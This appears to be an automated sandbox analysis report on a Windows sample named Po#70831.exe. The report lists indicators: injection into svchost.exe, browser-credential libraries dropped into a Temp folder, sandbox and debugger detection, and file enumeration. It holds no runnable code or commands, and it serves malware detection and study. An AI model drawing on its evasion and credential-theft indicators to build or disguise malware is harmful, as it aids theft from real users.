                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.2.dr
                Source: Po#70831.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Po#70831.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Po#70831.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Po#70831.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Po#70831.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: ucrtbase.dll.2.drStatic PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004942DE
                Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B0A76 push ecx; ret 0_2_004B0A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D86E push 0040D89Ch; ret 2_2_0040D894
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D870 push 0040D89Ch; ret 2_2_0040D894
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004140C0 push 004140ECh; ret 2_2_004140E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004108C8 push 004108F4h; ret 2_2_004108EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040B0F7 push 0040B124h; ret 2_2_0040B11C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040B0F8 push 0040B124h; ret 2_2_0040B11C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408080 push 004080B8h; ret 2_2_004080B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408158 push 00408196h; ret 2_2_0040818E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408970 push 004089E4h; ret 2_2_004089DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408994 push 004089E4h; ret 2_2_004089DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004089AC push 004089E4h; ret 2_2_004089DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415208 push 0041528Ch; ret 2_2_00415284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040CA0C push 0040CA3Ch; ret 2_2_0040CA34
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040CA10 push 0040CA3Ch; ret 2_2_0040CA34
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417AEC push 00417B18h; ret 2_2_00417B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404BC0 push 00404C11h; ret 2_2_00404C09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D3C0 push 0040D3ECh; ret 2_2_0040D3E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A3E4 push 0040A410h; ret 2_2_0040A408
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040C390 push 0040C3C0h; ret 2_2_0040C3B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040C394 push 0040C3C0h; ret 2_2_0040C3B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A3AC push 0040A3D8h; ret 2_2_0040A3D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC44 push 0040DCA3h; ret 2_2_0040DC9B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC0C push 0040DC38h; ret 2_2_0040DC30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040B41E push 0040B44Ch; ret 2_2_0040B444
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040B420 push 0040B44Ch; ret 2_2_0040B444
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A438 push 0040A464h; ret 2_2_0040A45C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A4F4 push 0041A51Ah; ret 2_2_0041A512
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414C80 push 00414CACh; ret 2_2_00414CA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409488 push 004094B8h; ret 2_2_004094B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A4AC push 0041A4E8h; ret 2_2_0041A4E0
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\ucrtbase.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\vcruntime140.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\nssdbm3.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\softokn3.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\mozglue.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\freebl3.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\nss3.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\msvcp140.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004AF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004AF98E
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00521C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00521C41
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00417B1A
                Source: C:\Users\user\Desktop\Po#70831.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\Desktop\Po#70831.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96403
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Po#70831.exeAPI/Special instruction interceptor: Address: 36D3234
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId,2_2_00416B94
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\nssdbm3.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\freebl3.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\softokn3.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\nss3.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                Source: C:\Users\user\Desktop\Po#70831.exeAPI coverage: 3.8 %
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_004FDBBE
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004CC2A2 FindFirstFileExW,0_2_004CC2A2
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_005068EE FindFirstFileW,FindClose,0_2_005068EE
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0050698F
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004FD076
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004FD3A9
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00509642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00509642
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0050979D
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00509B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00509B2B
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00505C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00505C97
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,2_2_004098A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D0A0 FindFirstFileW,2_2_0040D0A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,2_2_00414408
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,2_2_00408D44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415610 FindFirstFileW,FindNextFileW,FindClose,2_2_00415610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,2_2_004087DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D06E FindFirstFileW,2_2_0040D06E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041303C FindFirstFileW,FindNextFileW,FindClose,2_2_0041303C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040989F FindFirstFileW,FindNextFileW,FindClose,2_2_0040989F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,2_2_004111C4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,2_2_00414408
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415610 FindFirstFileW,FindNextFileW,FindClose,2_2_00415610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,2_2_00412D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,2_2_00412D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,2_2_00408D3C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,2_2_00412D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041158C FindFirstFileW,FindNextFileW,FindClose,2_2_0041158C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411590 FindFirstFileW,FindNextFileW,FindClose,2_2_00411590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,2_2_00412D9C
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004942DE
                Source: svchost.exe, 00000002.00000002.2482873821.0000000003248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000002.00000002.2482756320.0000000003212000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: svchost.exe, 00000002.00000002.2482899863.000000000325F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NativeFontCtlHyper-V RAWp)
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050EAA2 BlockInput,0_2_0050EAA2
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004C2622
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId,2_2_00416B94
